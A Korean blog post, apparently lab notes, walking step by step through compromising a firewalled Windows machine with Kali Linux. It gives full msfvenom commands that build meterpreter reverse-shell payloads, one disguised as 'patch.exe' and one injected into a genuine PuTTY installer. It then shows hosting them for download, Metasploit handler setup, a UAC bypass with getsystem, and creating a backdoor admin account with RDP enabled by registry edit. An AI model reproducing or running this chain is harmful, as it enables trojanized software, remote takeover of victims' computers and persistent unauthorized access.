본문 바로가기

보안/LINUX

칼리 리눅스(방화벽 on) 실행파일 이용 공격

공격대상이 방화벽이 on일 경우에는 어떤 방법이 있을까? 설치파일을 공격대상에게 보내서 사용자가 설치파일을 실행하게 되면 공격대상이 공격이 가능하게 한다.

msfvenom -a x64 --platform Windows -p windows/x64/meterpreter/reverse_tcp lhost=1.0.0.11 lport=4444 -f exe -o /root/patch.exe의 명령어 실행!

(홈 디렉토리에 포트 4444번을 쓰고 실행파일을 가진 patch.exe를 추가하겠다.)

Msfconsole

Use exploit/multi/handler

(Payload(페이로드) 연결을 받고 Handle(다룰) 수 있는 Handler로 이동하여 줌)

set payload windows/x64/meterpreter/reverse_tcp 실행

Show options으로 확인후 set lhost를 설정해 준다.(자기 자신의 ip)

Set lport 4444(아까 venom 설정해준 포트와 맞춰준다.)

exploit 실행! (대기중인 상황)

공격대상(1.0.0.101)pacth.exe를 설치했다. Patch를 실행~~

공격대상이 patch를 실행 하자마자 바로 meterpreter 접속이 된다!

정상적인 프로그램에 악성 코드 삽입 후 공격대상에게 실행 유도

Putty(64bit)에 삽입하기 위해서 먼저 wget명령어로 putty를 설치했다.

msfvenom을 이용하여 쉘코드를 정상적인 putty에 삽입

msfvenom -a x64 --platform Windows -p windows/x64/meterpreter/reverse_tcp lhost=1.0.0.11 lport=4444 -f exe -x putty.exe -o /root/fk_putty.exe 입력!

cp fk_putty.exe /var/www/html/download/ 입력!

명령어 입력(service apache2 start)

Kali의 아파치 웹서버를 이용해여 공격대상 시스템에서 파일 다운로드한다.

Msfconsole 명령과 use exploit/multi/handler 입력!

페이로드와 호스트, 포트설정을 한 후 실행한다.

 

공격대상이 putty를 실행하였다.

바로 접속이 되었음을 알 수 있다.

shell확인과 CHCP 65001(언어가 깨지는 것을 막아줌!)

계정을 생성해보면 권한이 없음을 알 수 있다. (Access is denied)

권한이 없기 떄문에 권한 상승을 해야 한다. getsystem 입력 후 background 입력!

Search uac을 통해 검색해서 2번째 것을 쓰겠다.(use 명령어 사용)

사용한 후 Session이 비어있음을 알 수 있다. Sessions 명령어를 통해 자기 자신의 session 확인 후 set session을 통해 할당하였다.

64bit target 설정!

**getsystem을 실행하여서 문제가 없는지 본다.

** migrate explore.exe(pid) -> explore.exepid값으로 이주시켜준다.

Shell 입력 후 권한이 생겨 유저가 잘 생성되었다.

비밀번호 설정 It1로 설정해주었다.

방화벽은 다운, 원격데스크탑 서비스는 cmd명령어로 실행한다.

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f (원격데스크탑 설정)

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f (원격데스크탑 해체)

Rdesktop을 이용하여서 원격 접속

rdesktop -u duck -p It1 1.0.0.200(window 2008)

관리자의 그룹으로 duck이라는 계정을 추가해줬기 때문에 관리자의 권한을 가진다. 관리자의 권한을 가지는지 확인하기 위해 duck2라는 계정생성을 해보았다. 무사히 생성!

 

'보안 > LINUX' 카테고리의 다른 글

kali vmware tool 설치  (0) 2019.07.12
kali 한글 설치  (0) 2019.07.12
SNMP 취약점을 통한 공격  (0) 2019.07.08
칼리 리눅스 (강제 종료 공격)  (0) 2019.07.08
칼리 리눅스(방화벽 off) 이터널블루 공격  (0) 2019.07.08